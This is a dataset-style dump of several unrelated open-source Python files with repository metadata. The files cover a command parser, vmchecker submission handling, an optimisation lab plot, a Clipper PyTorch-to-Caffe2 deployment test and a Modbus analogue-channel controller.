tex.write("$-\ln{\cal L}_\mathrm{min} =%.6g$, " % (
self.min_minus_lkl))
tex.write("minimum $\chi^2=%.4g$ \\\\ \n" % (
self.min_minus_lkl*2.))
|
mit
| 3,279,992,004,840,234,500 | 43.253259 | 153 | 0.52346 | false | 4.247743 | false | false | false |
call-me-jimi/hq
|
hq/lib/hQCommand.py
|
1
|
1329
|
import re
class hQCommand( object ):
"""! @brief Command """
def __init__( self,
name,
regExp,
arguments = [],
permission = None,
fct = None,
help = "",
fullhelp = "" ):
self.name = name
self.arguments = arguments
self.re = re.compile(regExp)
self.permission = permission
self.fct = fct
self.help = help
self.fullhelp = fullhelp
def match( self, command_str ):
"""! @brief match regExp agains command_str """
return self.re.match( command_str )
def groups( self, command_str ):
"""! @brief return groups in regular expression """
match = self.re.match( command_str )
if match:
return match.groups()
else:
return None
def get_command_str( self ):
"""! @brief return command string """
s = self.name
for a in self.arguments:
s += ":<{A}>".format(A=a.upper())
return s
def get_fullhelp( self ):
"""! @brief return fullhelp or, if not given, help """
if self.fullhelp:
return self.fullhelp
else:
return self.help
|
gpl-2.0
| 594,055,388,762,925,400 | 24.075472 | 62 | 0.470278 | false | 4.489865 | false | false | false |
cojocar/vmchecker
|
vmchecker/submissions.py
|
1
|
4960
|
#! /bin/bin/env python
# -*- coding: utf-8 -*-
"""
"""
from __future__ import with_statement
import ConfigParser
import os
import time
import datetime
import logging
from .config import DATE_FORMAT
from . import paths
_logger = logging.getLogger('vmchecker.submissions')
def get_time_struct_from_str(time_str):
"""Returns a time_struct object from the time_str string given"""
time_struct = time.strptime(time_str, DATE_FORMAT)
return time_struct
def get_datetime_from_time_struct(time_struct):
"""Returns a datetime object from time time_struct given"""
return datetime.datetime(*time_struct[:6])
class Submissions:
"""A class to manipulate submissions from a given repository"""
def __init__(self, vmpaths):
"""Create a Submissions class. vmpaths is a
vmchecker.paths.VmcheckerPaths object holding information
about one course configuration."""
self.vmpaths = vmpaths
def _get_submission_config_fname(self, assignment, user):
"""Returns the last submissions's configuration file name for
the given user for the given assignment.
If the config file cannot be found, returns None.
"""
sbroot = self.vmpaths.dir_cur_submission_root(assignment, user)
if not os.path.isdir(sbroot):
return None
config_file = paths.submission_config_file(sbroot)
if not os.path.isfile(config_file):
_logger.warn('%s found, but config (%s) is missing',
sbroot, config_file)
return None
return config_file
def _get_submission_config(self, assignment, user):
"""Returns a ConfigParser for the last submissions's
configuration file name for the given user for the given
assignment.
If the config file cannot be found, returns None.
"""
config_file = self._get_submission_config_fname(assignment, user)
if config_file == None:
return None
hrc = ConfigParser.RawConfigParser()
with open(config_file) as handler:
hrc.readfp(handler)
return hrc
def get_upload_time_str(self, assignment, user):
"""Returns a string representing the user's last submission date"""
hrc = self._get_submission_config(assignment, user)
if hrc == None:
return None
return hrc.get('Assignment', 'UploadTime')
def get_eval_queueing_time_str(self, assignment, user):
"""Returns a string representing the last time the submission
was queued for evaluation"""
hrc = self._get_submission_config(assignment, user)
if hrc == None:
return None
if not hrc.has_option('Assignment', 'EvaluationQueueingTime'):
return None
return hrc.get('Assignment', 'EvaluationQueueingTime')
def get_upload_time_struct(self, assignment, user):
"""Returns a time_struct object with the upload time of the
user's last submission"""
upload_time_str = self.get_upload_time_str(assignment, user)
return get_time_struct_from_str(upload_time_str)
def get_upload_time(self, assignment, user):
"""Returns a datetime object with the upload time of the
user's last submission"""
upload_time_struct = self.get_upload_time_struct(assignment, user)
return get_datetime_from_time_struct(upload_time_struct)
def get_eval_queueing_time_struct(self, assignment, user):
"""Returns a time_struct object with the upload time of the
last evaluation queueing for the user's last submission"""
time_str = self.get_eval_queueing_time_str(assignment, user)
return get_time_struct_from_str(time_str)
def get_eval_queueing_time(self, assignment, user):
"""Returns a datetime object with the upload time of the last
evaluation queueing for the user's last submission"""
time_struct = self.get_eval_queueing_time_struct(assignment, user)
return get_datetime_from_time_struct(time_struct)
def set_eval_parameters(self, assignment, user, archive, eval_time):
"""Appends the archive filename to an existing
submission-config (used for Large type assignments)"""
config_file = self._get_submission_config_fname(assignment, user)
if config_file == None:
return None
hrc = ConfigParser.RawConfigParser()
with open(config_file) as handler:
hrc.readfp(handler)
hrc.set('Assignment', 'ArchiveFilename', archive)
hrc.set('Assignment', 'EvaluationQueueingTime', eval_time)
with open(config_file, "w") as handler:
hrc.write(handler)
def submission_exists(self, assignment, user):
"""Returns true if a valid submission exists for the given
user and assignment"""
return (self._get_submission_config(assignment, user) != None)
|
mit
| -8,193,271,641,474,638,000 | 32.513514 | 75 | 0.653831 | false | 4.178602 | true | false | false |
budnyjj/bsuir_magistracy
|
disciplines/OTOS/lab_1/lab.py
|
1
|
1813
|
#!/usr/bin/env python
import functools
import math
import random
import numpy as np
import matplotlib.pyplot as plt
plt.rc('text', usetex=True)
plt.rc('font', family='serif')
# 1D model
def model(x):
a = 2.7; d = 0.1; y_0 = 2
sigma = 0.001
result = y_0 - 0.04 * (x - a) - d * (x - a)**2
return result + random.gauss(0, sigma)
def search_asymmetric(model, start_x, num_iter=100):
next_x = cur_x = start_x
vals_x = [cur_x]
for k in range(num_iter):
alpha = (k + 1) ** (-1/3)
factor = (k + 1) ** (-2/3)
next_x = cur_x + factor * (model(cur_x + alpha) - model(cur_x))
cur_x = next_x
vals_x.append(cur_x)
return vals_x
def search_symmetric(model, start_x, num_iter=100):
next_x = cur_x = start_x
vals_x = [cur_x]
for k in range(num_iter):
alpha = (k + 1) ** (-1/3)
factor = (k + 1) ** (-2/3)
next_x = cur_x + factor * (model(cur_x + alpha) - model(cur_x - alpha))
cur_x = next_x
vals_x.append(cur_x)
return vals_x
NUM_ITER = 1000
MIN_X = 1; MAX_X = 10; NUM_X = 100
VALS_X = np.linspace(MIN_X, MAX_X, NUM_X)
model_vec = np.vectorize(model)
plt.plot(VALS_X, model_vec(VALS_X),
color='r', linestyle=' ',
marker='.', markersize=5,
label='model')
search_asymmetric_x = search_asymmetric(model, MAX_X, NUM_ITER)
plt.plot(search_asymmetric_x, model_vec(search_asymmetric_x),
color='g', marker='x', markersize=5,
label='asymmetric')
search_symmetric_x = search_symmetric(model, MAX_X, NUM_ITER)
plt.plot(search_symmetric_x, model_vec(search_symmetric_x),
color='b', marker='x', markersize=5,
label='symmetric')
plt.xlabel('$ x $')
plt.ylabel('$ y $')
plt.grid(True)
# plt.legend(loc=2)
plt.savefig('plot.png', dpi=200)
|
gpl-3.0
| 7,770,229,010,586,717,000 | 24.9 | 79 | 0.578047 | false | 2.681953 | false | false | false |
ucbrise/clipper
|
integration-tests/deploy_pytorch_to_caffe2_with_onnx.py
|
1
|
7042
|
from __future__ import absolute_import, print_function
import os
import sys
import requests
import json
import numpy as np
import time
import logging
cur_dir = os.path.dirname(os.path.abspath(__file__))
import torch
import torch.utils.data as data
from torch import nn, optim
from torch.autograd import Variable
import torch.nn.functional as F
from test_utils import (create_docker_connection, BenchmarkException, headers,
log_clipper_state)
cur_dir = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, os.path.abspath("%s/../clipper_admin" % cur_dir))
from clipper_admin.deployers.onnx import deploy_pytorch_model, create_pytorch_endpoint
logging.basicConfig(
format='%(asctime)s %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',
datefmt='%y-%m-%d:%H:%M:%S',
level=logging.INFO)
logger = logging.getLogger(__name__)
app_name = "caffe2-test"
model_name = "caffe2-model"
def normalize(x):
return x.astype(np.double) / 255.0
def objective(y, pos_label):
# prediction objective
if y == pos_label:
return 1
else:
return 0
def parsedata(train_path, pos_label):
trainData = np.genfromtxt(train_path, delimiter=',', dtype=int)
records = trainData[:, 1:]
labels = trainData[:, :1]
transformedlabels = [objective(ele, pos_label) for ele in labels]
return (records, transformedlabels)
def predict(model, inputs):
preds = model.run(np.array(inputs).astype(np.float32))
return [str(p) for p in preds[0]]
def deploy_and_test_model(clipper_conn,
model,
inputs,
version,
link_model=False,
predict_fn=predict):
deploy_pytorch_model(
clipper_conn,
model_name,
version,
"integers",
inputs,
predict_fn,
model,
onnx_backend="caffe2")
time.sleep(5)
if link_model:
clipper_conn.link_model_to_app(app_name, model_name)
time.sleep(5)
test_model(clipper_conn, app_name, version)
def test_model(clipper_conn, app, version):
time.sleep(25)
num_preds = 25
num_defaults = 0
addr = clipper_conn.get_query_addr()
for i in range(num_preds):
response = requests.post(
"http://%s/%s/predict" % (addr, app),
headers=headers,
data=json.dumps({
'input': get_test_point()
}))
result = response.json()
if response.status_code == requests.codes.ok and result["default"]:
num_defaults += 1
elif response.status_code != requests.codes.ok:
logger.error(result)
raise BenchmarkException(response.text)
if num_defaults > 0:
logger.error("Error: %d/%d predictions were default" % (num_defaults,
num_preds))
if num_defaults > num_preds / 2:
raise BenchmarkException("Error querying APP %s, MODEL %s:%d" %
(app, model_name, version))
# Define a simple NN model
class BasicNN(nn.Module):
def __init__(self):
super(BasicNN, self).__init__()
self.net = nn.Linear(28 * 28, 2)
def forward(self, x):
if isinstance(x, np.ndarray):
x = torch.from_numpy(x)
x = x.float()
if isinstance(x, type(torch.randn(1))):
x = Variable(x)
x = x.view(1, 1, 28, 28)
x = x / 255.0
batch_size = x.size(0)
x = x.view(batch_size, -1)
output = self.net(x.float())
return F.softmax(output)
def train(model):
model.train()
optimizer = optim.SGD(model.parameters(), lr=0.001)
for epoch in range(10):
for i, d in enumerate(train_loader, 1):
image, j = d
optimizer.zero_grad()
output = model(image)
loss = F.cross_entropy(output,
Variable(
torch.LongTensor([train_y[i - 1]])))
loss.backward()
optimizer.step()
return model
def get_test_point():
return [np.random.randint(255) for _ in range(784)]
# Define a dataloader to read data
class TrainingDataset(data.Dataset):
def __init__(self, data, label):
self.imgs = data
self.classes = label
def __getitem__(self, index):
img = self.imgs[index]
label = self.classes[index]
img = torch.Tensor(img)
return img, torch.Tensor(label)
if __name__ == "__main__":
pos_label = 3
import random
cluster_name = "onnx-{}".format(random.randint(0, 5000))
try:
clipper_conn = create_docker_connection(
cleanup=False, start_clipper=True, new_name=cluster_name)
train_path = os.path.join(cur_dir, "data/train.data")
train_x, train_y = parsedata(train_path, pos_label)
train_x = normalize(train_x)
train_loader = TrainingDataset(train_x, train_y)
try:
clipper_conn.register_application(app_name, "integers",
"default_pred", 100000)
time.sleep(1)
addr = clipper_conn.get_query_addr()
response = requests.post(
"http://%s/%s/predict" % (addr, app_name),
headers=headers,
data=json.dumps({
'input': get_test_point()
}))
result = response.json()
if response.status_code != requests.codes.ok:
logger.error("Error: %s" % response.text)
raise BenchmarkException("Error creating app %s" % app_name)
version = 1
model = BasicNN()
nn_model = train(model)
inputs = Variable(torch.randn(len(get_test_point())))
deploy_and_test_model(
clipper_conn, nn_model, inputs, version, link_model=True)
app_and_model_name = "easy-register-app-model"
create_pytorch_endpoint(
clipper_conn,
app_and_model_name,
"integers",
inputs,
predict,
nn_model,
onnx_backend="caffe2")
test_model(clipper_conn, app_and_model_name, 1)
except BenchmarkException:
sys.exit(1)
log_clipper_state(clipper_conn)
logger.exception("BenchmarkException")
clipper_conn = create_docker_connection(
cleanup=True, start_clipper=False, cleanup_name=cluster_name)
sys.exit(1)
else:
clipper_conn = create_docker_connection(
cleanup=True, start_clipper=False, cleanup_name=cluster_name)
except Exception:
logger.exception("Exception")
clipper_conn = create_docker_connection(
cleanup=True, start_clipper=False, cleanup_name=cluster_name)
sys.exit(1)
|
apache-2.0
| 3,313,663,111,982,408,000 | 29.484848 | 86 | 0.557938 | false | 3.816802 | true | false | false |
dcneeme/droidcontroller
|
achannels.py
|
1
|
26311
|
# to be imported to access modbus registers as analogue io
# 03.04.2014 neeme
# 04.04.2014 it works, without periodical executuoin and without acces by svc reg
# 06.04.2014 seguential register read for optimized reading, done
# 14.04.2014 mb[mbi] (multiple modbus connections) support. NOT READY!
# 16.04.2014 fixed mts problem, service messaging ok
from sqlgeneral import * # SQLgeneral / vaja ka time,mb, conn jne
s=SQLgeneral() # sql connection
class Achannels(SQLgeneral): # handles aichannels and aochannels tables
''' Access to io by modbus analogue register addresses (and also via services?).
Modbus client must be opened before.
Able to sync input and output channels and accept changes to service members by their sta_reg code
'''
def __init__(self, in_sql = 'aichannels.sql', out_sql = 'aochannels.sql', readperiod = 10, sendperiod = 30): # period for mb reading, renotify for udpsend
self.setReadPeriod(readperiod)
self.setSendPeriod(sendperiod)
self.in_sql = in_sql.split('.')[0]
self.out_sql = out_sql.split('.')[0]
self.s = SQLgeneral()
self.Initialize()
def setReadPeriod(self, invar):
''' Set the refresh period, executes sync if time from last read was earlier than period ago '''
self.readperiod = invar
def setSendPeriod(self, invar):
''' Set the refresh period, executes sync if time from last read was earlier than period ago '''
self.sendperiod = invar
def sqlread(self,table):
self.s.sqlread(table) # read dichannels
def Initialize(self): # before using this create s=SQLgeneral()
''' initialize delta t variables, create tables and modbus connection '''
self.ts = round(time.time(),1)
self.ts_read = self.ts # time of last read
self.ts_send = self.ts -150 # time of last reporting
self.sqlread(self.in_sql) # read aichannels
self.sqlread(self.out_sql) # read aochannels if exist
def read_ai_grp(self,mba,regadd,count,mbi=0): # using self,in_sql as the table to store in. mbi - modbus channel index
''' Read sequential register group and store raw into table self.in_sql. Inside transaction! '''
msg='reading data for aichannels group from mbi '+str(mbi)+', mba '+str(mba)+', regadd '+str(regadd)+', count '+str(count)
#print(msg) # debug
if count>0 and mba<>0:
result = mb[mbi].read(mba, regadd, count=count, type='h') # client.read_holding_registers(address=regadd, count=1, unit=mba)
else:
print('invalid parameters for read_ai_grp()!',mba,regadd,count)
return 2
if result != None:
try:
for i in range(count): # tuple to table rows. tuple len is twice count!
Cmd="UPDATE "+self.in_sql+" set raw='"+str(result[i])+"', ts='"+str(self.ts)+"' where mba='"+str(mba)+"' and mbi="+str(mbi)+" and regadd='"+str(regadd+i)+"'" # koigile korraga
#print(Cmd) # debug
conn.execute(Cmd)
return 0
except:
traceback.print_exc()
return 1
else:
msg='ai grp data reading FAILED!'
print(msg)
return 1
def sync_ai(self): # analogue input readings to sqlite, to be executed regularly.
#global MBerr
mba=0
val_reg=''
mcount=0
block=0 # vigade arv
#self.ts = time.time()
ts_created=self.ts # selle loeme teenuse ajamargiks
value=0
ovalue=0
Cmd = ''
Cmd3= ''
cur = conn.cursor()
cur3 = conn.cursor()
bfirst=0
blast=0
bmba=0
bmbi=0
bcount=0
try:
Cmd="BEGIN IMMEDIATE TRANSACTION" # hoiab kinni kuni mb suhtlus kestab? teised seda ei kasuta samal ajal nagunii. iga tabel omaette.
conn.execute(Cmd)
#self.conn.execute(Cmd)
Cmd="select mba,regadd,mbi from "+self.in_sql+" where mba<>'' and regadd<>'' group by mbi,mba,regadd" # tsykkel lugemiseks, tuleks regadd kasvavasse jrk grupeerida
cur.execute(Cmd) # selle paringu alusel raw update, hiljem teha value arvutused iga teenuseliikme jaoks eraldi
for row in cur:
mbi=int(row[2]) # niigi num
mba=int(row[0])
regadd=int(row[1])
if bfirst == 0:
bfirst = regadd
blast = regadd
bcount=1
bmba=mba
bmbi=mbi
#print('ai group mba '+str(bmba)+' start ',bfirst,'mbi',mbi) # debug
else: # not the first
if mbi == bmbi and mba == bmba and regadd == blast+1: # sequential group still growing
blast = regadd
bcount=bcount+1
#print('ai group end shifted to',blast) # debug
else: # a new group started, make a query for previous
#print('ai group end detected at regadd',blast,'bcount',bcount) # debugb
#print('going to read ai registers from',bmbi,bmba,bfirst,'to',blast,'regcount',bcount) # debug
self.read_ai_grp(bmba,bfirst,bcount,bmbi) # reads and updates table with previous data
bfirst = regadd # new grp starts immediately
blast = regadd
bcount=1
bmba=mba
bmbi=mbi
#print('ai group mba '+str(bmba)+' start ',bfirst) # debug
if bfirst != 0: # last group yet unread
#print('ai group end detected at regadd',blast) # debugb
#print('going to read ai registers from',bmba,bfirst,'to',blast,'regcount',bcount) # debug
self.read_ai_grp(bmba,bfirst,bcount,bmbi) # reads and updates table
# raw updated for all aichannels
# now process raw -> value, by services. x1 x2 y1 y may be different even if the same mba regadd in use. DO NOT calculate status here, happens separately.
Cmd="select val_reg from "+self.in_sql+" where mba<>'' and regadd<>'' group by val_reg" # service list. other
cur.execute(Cmd) # selle paringu alusel raw update, hiljem teha value arvutused iga teenuseliikme jaoks eraldi
for row in cur: # services
status=0 # esialgu, aga selle jaoks vaja iga teenuse jaoks oma tsykkel.
val_reg=row[0] # teenuse nimi
Cmd3="select * from "+self.in_sql+" where val_reg='"+val_reg+"' and mba<>'' and regadd<>'' order by member" # loeme yhe teenuse kogu info
cur3.execute(Cmd3) # another cursor to read the same table
for srow in cur3: # value from raw and also status
#print repr(srow) # debug
mba=-1 #
regadd=-1
member=0
cfg=0
x1=0
x2=0
y1=0
y2=0
outlo=0
outhi=0
ostatus=0 # eelmine
#tvalue=0 # test, vordlus
raw=0
ovalue=0 # previous (possibly averaged) value
ots=0 # eelmine ts value ja status ja raw oma
avg=0 # keskmistamistegur, mojub alates 2
desc=''
comment=''
# 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
#mba,regadd,val_reg,member,cfg,x1,x2,y1,y2,outlo,outhi,avg,block,raw,value,status,ts,desc,comment # "+self.in_sql+"
if srow[0] != '':
mba=int(srow[0]) # must be int! will be -1 if empty (setpoints)
if srow[1] != '':
regadd=int(srow[1]) # must be int! will be -1 if empty
val_reg=srow[2] # see on string
if srow[3] != '':
member=int(srow[3])
if srow[4] != '':
cfg=int(srow[4]) # konfibait nii ind kui grp korraga, esita hex kujul hiljem
if srow[5] != '':
x1=int(srow[5])
if srow[6] != '':
x2=int(srow[6])
if srow[7] != '':
y1=int(srow[7])
if srow[8] != '':
y2=int(srow[8])
#if srow[9] != '':
# outlo=int(srow[9])
#if srow[10] != '':
# outhi=int(srow[10])
if srow[11] != '':
avg=int(srow[11]) # averaging strength, values 0 and 1 do not average!
if srow[12] != '': # block - loendame siin vigu, kui kasvab yle 3? siis enam ei saada
block=int(srow[12]) #
if srow[13] != '': #
raw=int(srow[13])
if srow[14] != '':
ovalue=eval(srow[14]) # ovalue=int(srow[14])
#if srow[15] != '':
# ostatus=int(srow[15])
if srow[16] != '':
ots=eval(srow[16])
#desc=srow[17]
#comment=srow[18]
#jargmise asemel vt pid interpolate
if x1 != x2 and y1 != y2: # konf normaalne
value=(raw-x1)*(y2-y1)/(x2-x1) # lineaarteisendus
value=y1+value
msg=val_reg
#print 'raw',raw,', value',value, # debug
if avg>1 and abs(value-ovalue)<value/2: # keskmistame, hype ei ole suur
#if avg>1: # lugemite keskmistamine vajalik, kusjures vaartuse voib ju ka komaga sailitada!
value=((avg-1)*ovalue+value)/avg # averaging
msg=msg+', averaged '+str(int(value))
else: # no averaging for big jumps
msg=msg+', nonavg value '+str(int(value))
else:
print("val_reg",val_reg,"member",member,"ai2scale PARAMETERS INVALID:",x1,x2,'->',y1,y2,'value not used!')
value=0
status=3 # not to be sent status=3! or send member as NaN?
print(msg) # temporarely off SIIN YTLEB RAW LUGEMI AI jaoks
#print 'status for AI val_reg, member',val_reg,member,status,'due to cfg',cfg,'and value',value,'while limits are',outlo,outhi # debug
#"+self.in_sql+" update with new value and sdatus
Cmd="UPDATE "+self.in_sql+" set status='"+str(status)+"', value='"+str(value)+"' where val_reg='"+val_reg+"' and member='"+str(member)+"' and mbi='"+str(mbi)+"'" # meelde
#print Cmd
conn.execute(Cmd)
conn.commit()
#self.conn.commit() # "+self.in_sql+" transaction end
return 0
except:
msg='PROBLEM with '+self.in_sql+' reading or processing: '+str(sys.exc_info()[1])
print(msg)
#syslog(msg)
traceback.print_exc()
sys.stdout.flush()
time.sleep(0.5)
return 1
def sync_ao(self): # synchronizes AI registers with data in aochannels table
#print('write_aochannels start') # debug
# and use write_register() write modbus registers to get the desired result (all ao channels must be also defined in aichannels table!)
respcode=0
mba=0
omba=0 # previous value
val_reg=''
desc=''
value=0
word=0 # 16 bit register value
#comment=''
mcount=0
cur = conn.cursor()
cur3 = conn.cursor()
ts_created=self.ts # selle loeme teenuse ajamargiks
try:
Cmd="BEGIN IMMEDIATE TRANSACTION"
conn.execute(Cmd)
# 0 1 2 3 4 5 6 7
#mba,regadd,bit,bootvalue,value,rule,desc,comment
Cmd="select aochannels.mba,aochannels.regadd,aochannels.value,aochannels.mbi from aochannels left join aichannels \
on aochannels.mba = aichannels.mba AND aochannels.mbi = aichannels.mbi AND aochannels.regadd = aichannels.regadd \
where aochannels.value != aichannels.value" #
# the command above retrieves mba, regadd and value where values do not match in aichannels and aochannels
#print "Cmd=",Cmd
cur.execute(Cmd)
for row in cur: # got mba, regadd and value for registers that need to be updated / written
regadd=0
mba=0
if row[0] != '':
mba=int(row[0]) # must be a number
if row[1] != '':
regadd=int(row[1]) # must be a number
if row[1] != '':
value=int(float(row[2])) # komaga nr voib olla, teha int!
msg='write_aochannels: going to write value '+str(value)+' to register mba.regadd '+str(mba)+'.'+str(regadd)
print(msg) # debug
#syslog(msg)
#client.write_register(address=regadd, value=value, unit=mba)
''' write(self, mba, reg, type = 'h', **kwargs):
:param 'mba': Modbus device address
:param 'reg': Modbus register address
:param 'type': Modbus register type, h = holding, c = coil
:param kwargs['count']: Modbus registers count for multiple register write
:param kwargs['value']: Modbus register value to write
:param kwargs['values']: Modbus registers values array to write
'''
respcode=respcode+mb[mbi].write(mba=mba, reg=regadd,value=value)
conn.commit() # transaction end - why?
return 0
except:
msg='problem with aochannel - aichannel sync!'
print(msg)
#syslog(msg)
traceback.print_exc()
sys.stdout.flush()
return 1
# write_aochannels() end. FRESHENED DICHANNELS TABLE VALUES AND CGH BITS (0 TO SEND, 1 TO PROCESS)
def get_aivalue(self,svc,member): # returns raw,value,lo,hi,status values based on service name and member number
#(mba,regadd,val_reg,member,cfg,x1,x2,y1,y2,outlo,outhi,avg,block,raw,value,status,ts,desc,comment,type integer)
Cmd3="BEGIN IMMEDIATE TRANSACTION" # conn3, et ei saaks muutuda lugemise ajal
conn3.execute(Cmd3)
Cmd3="select value,outlo,outhi,status from "+self.in_sql+" where val_reg='"+svc+"' and member='"+str(member)+"'"
#Cmd3="select raw,value,outlo,outhi,status,mba,regadd,val_reg,member from aichannels where val_reg='"+svc+"' and member='"+str(member)+"'" # debug. raw ei tule?
#print(Cmd3) # debug
cursor3.execute(Cmd3)
raw=0
value=None
outlo=0
outhi=0
status=0
found=0
for row in cursor3: # should be one row only
#print(repr(row)) # debug
found=1
#raw=int(float(row[0])) if row[0] != '' and row[0] != None else 0
value=int(float(row[0])) if row[0] != '' and row[0] != None else 0
outlo=int(float(row[1])) if row[1] != '' and row[1] != None else 0
outhi=int(float(row[2])) if row[2] != '' and row[2] != None else 0
status=int(float(row[3])) if row[3] != '' and row[3] != None else 0
if found == 0:
msg='get_aivalue failure, no member '+str(member)+' for '+svc+' found!'
print(msg)
#syslog(msg)
conn3.commit()
#print('get_aivalue ',svc,member,'value,outlo,outhi,status',value,outlo,outhi,status) # debug
return value,outlo,outhi,status
def set_aivalue(self,svc,member,value): # sets variables like setpoints or limits to be reported within services, based on service name and member number
#(mba,regadd,val_reg,member,cfg,x1,x2,y1,y2,outlo,outhi,avg,block,raw,value,status,ts,desc,comment,type integer)
Cmd="BEGIN IMMEDIATE TRANSACTION" # conn3
conn.execute(Cmd)
Cmd="update aichannels set value='"+str(value)+"' where val_reg='"+svc+"' and member='"+str(member)+"'"
#print(Cmd) # debug
try:
conn.execute(Cmd)
conn.commit()
return 0
except:
msg='set_aivalue failure: '+str(sys.exc_info()[1])
print(msg)
#syslog(msg)
return 1 # update failure
def set_aovalue(self, value,mba,reg): # sets variables to control, based on physical addresses
#(mba,regadd,bootvalue,value,ts,rule,desc,comment)
Cmd="BEGIN IMMEDIATE TRANSACTION" # conn3
conn.execute(Cmd)
Cmd="update aochannels set value='"+str(value)+"' where regadd='"+str(reg)+"' and mba='"+str(mba)+"'"
try:
conn.execute(Cmd)
conn.commit()
return 0
except:
msg='set_aovalue failure: '+str(sys.exc_info()[1])
print(msg)
#syslog(msg)
return 1 # update failure
def set_aosvc(self,svc,member,value): # to set a readable output channel by the service name and member using dichannels table
#(mba,regadd,val_reg,member,cfg,x1,x2,y1,y2,outlo,outhi,avg,block,raw,value,status,ts,desc,comment,type integer) # ai
Cmd="BEGIN IMMEDIATE TRANSACTION"
conn.execute(Cmd)
Cmd="select mba,regadd from "+self.in_sql+" where val_reg='"+svc+"' and member='"+str(member)+"'"
cur=conn.cursor()
cur.execute(Cmd)
mba=None
reg=None
for row in cur: # should be one row only
try:
mba=row[0]
reg=row[1]
set_aovalue(value,mba,reg)
conn.commit()
return 0
except:
msg='set_aovalue failed for reg '+str(reg)+': '+str(sys.exc_info()[1])
print(msg)
#syslog(msg)
return 1
def make_aichannels(self,svc = ''): # send the ai service messages to the monitoring server (only if fresh enough, not older than 2xappdelay). all or just one svc.
mba=0
val_reg=''
desc=''
cur=conn.cursor()
ts_created=self.ts # selle loeme teenuse ajamargiks
try:
Cmd="BEGIN IMMEDIATE TRANSACTION" # conn3, kogu selle teenustegrupiga (aichannels) tegelemine on transaction
conn.execute(Cmd)
if svc == '': # all services
Cmd="select val_reg from "+self.in_sql+" group by val_reg"
else: # just one
Cmd="select val_reg from "+self.in_sql+" where val_reg='"+svc+"'"
cur.execute(Cmd)
for row in cur: # services
val_reg=row[0] # teenuse nimi
sta_reg=val_reg[:-1]+"S" # nimi ilma viimase symbolita ja S - statuse teenuse nimi, analoogsuuruste ja temp kohta
if self.make_aichannel_svc(val_reg,sta_reg) == 0: # successful svc insertion into buff2server
pass
#print('tried to report svc',val_reg,sta_reg)
else:
print('make_aichannel FAILED to report svc',val_reg,sta_reg)
return 1 #cancel
conn.commit() # aichannels transaction end
except:
msg='PROBLEM with aichannels reporting '+str(sys.exc_info()[1])
print(msg)
#syslog(msg)
traceback.print_exc()
sys.stdout.flush()
time.sleep(0.5)
return 1
def make_aichannel_svc(self,val_reg,sta_reg): #
''' make a single service record (with status chk) based on aichannel members and send it away to UDPchannel '''
status=0 # initially
cur=conn.cursor()
lisa=''
#print 'reading aichannels values for val_reg',val_reg,'with',mcount,'members' # ajutine
Cmd="select * from "+self.in_sql+" where val_reg='"+val_reg+"'" # loeme yhe teenuse kogu info uuesti
#print Cmd3 # ajutine
cur.execute(Cmd) # another cursor to read the same table
mts=0 # max timestamp for svc members. if too old, skip messaging to server
for srow in cur: # service members
#print repr(srow) # debug
mba=-1 #
regadd=-1
member=0
cfg=0
x1=0
x2=0
y1=0
y2=0
outlo=0
outhi=0
ostatus=0 # eelmine
#tvalue=0 # test, vordlus
oraw=0
ovalue=0 # previous (possibly averaged) value
ots=0 # eelmine ts value ja status ja raw oma
avg=0 # keskmistamistegur, mojub alates 2
#desc=''
#comment=''
# 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
#mba,regadd,val_reg,member,cfg,x1,x2,y1,y2,outlo,outhi,avg,block,raw,value,status,ts,desc,comment # aichannels
mba=int(srow[0]) if srow[0] != '' else 0 # must be int! will be -1 if empty (setpoints)
regadd=int(srow[1]) if srow[1] != '' else 0 # must be int! will be -1 if empty
val_reg=srow[2] # see on string
member=int(srow[3]) if srow[3] != '' else 0
cfg=int(srow[4]) if srow[4] != '' else 0 # konfibait nii ind kui grp korraga, esita hex kujul hiljem
x1=int(srow[5]) if srow[5] != '' else 0
x2=int(srow[6]) if srow[6] != '' else 0
y1=int(srow[7]) if srow[7] != '' else 0
y2=int(srow[8]) if srow[8] != '' else 0
outlo=int(srow[9]) if srow[9] != '' else None
outhi=int(srow[10]) if srow[10] != '' else None
avg=int(srow[11]) if srow[11] != '' else 0 # averaging strength, values 0 and 1 do not average!
#block=int(srow[12]) if srow[12] != '' else 0 # - loendame siin vigu, kui kasvab yle 3? siis enam ei saada
oraw=int(srow[13]) if srow[13] != '' else 0
value=float(srow[14]) if srow[14] != '' else 0 # teenuseliikme vaartus
ostatus=int(srow[15]) if srow[15] != '' else 0 # teenusekomponendi status - ei kasuta
ots=eval(srow[16]) if srow[16] != '' else 0
#desc=srow[17]
#comment=srow[18]
################ sat
# ai svc STATUS CHK. check the value limits and set the status, according to configuration byte cfg bits values
# use hysteresis to return from non-zero status values
status=0 # initially for each member
if value>outhi: # above hi limit
if (cfg&4) and status == 0: # warning
status=1
if (cfg&8) and status<2: # critical
status=2
if (cfg&12) == 12: # not to be sent
status=3
#block=block+1 # error count incr
else: # return with hysteresis 5%
if value>outlo and value<outhi-0.05*(outhi-outlo): # value must not be below lo limit in order for status to become normal
status=0 # back to normal
# block=0 # reset error counter
if value<outlo: # below lo limit
if (cfg&1) and status == 0: # warning
status=1
if (cfg&2) and status<2: # critical
status=2
if (cfg&3) == 3: # not to be sent, unknown
status=3
#block=block+1 # error count incr
else: # back with hysteresis 5%
if value<outhi and value>outlo+0.05*(outhi-outlo):
status=0 # back to normal
#block=0
#############
#print 'make ai mba ots mts',mba,ots,mts # debug
if mba>0:
if ots>mts:
mts=ots # latest member timestamp for the current service
if lisa != '': # not the first member
lisa=lisa+' ' # separator between member values
lisa=lisa+str(value) # adding member values into one string
# service done
if self.ts-mts < 3*self.readperiod and status<3: # data fresh enough to be sent
sendtuple=[sta_reg,status,val_reg,lisa] # sending service to buffer
# print('ai svc - going to report',sendtuple) # debug
udp.send(sendtuple) # to uniscada instance
else:
msg='skipping ai data send (buff2server wr) due to stale aichannels data, reg '+val_reg+',mts '+str(mts)+', ts '+str(self.ts)
#syslog(msg) # incl syslog
print(msg)
return 1
return 0
def doall(self): # do this regularly, executes only if time is is right
''' Does everything on time if executed regularly '''
self.ts = round(time.time(),1)
if self.ts - self.ts_read > self.readperiod:
self.ts_read = self.ts
self.sync_ai() #
self.sync_ao() # writes output registers to be changed via modbus, based on feedback on di bits
if self.ts - self.ts_send > self.sendperiod:
self.ts_send = self.ts
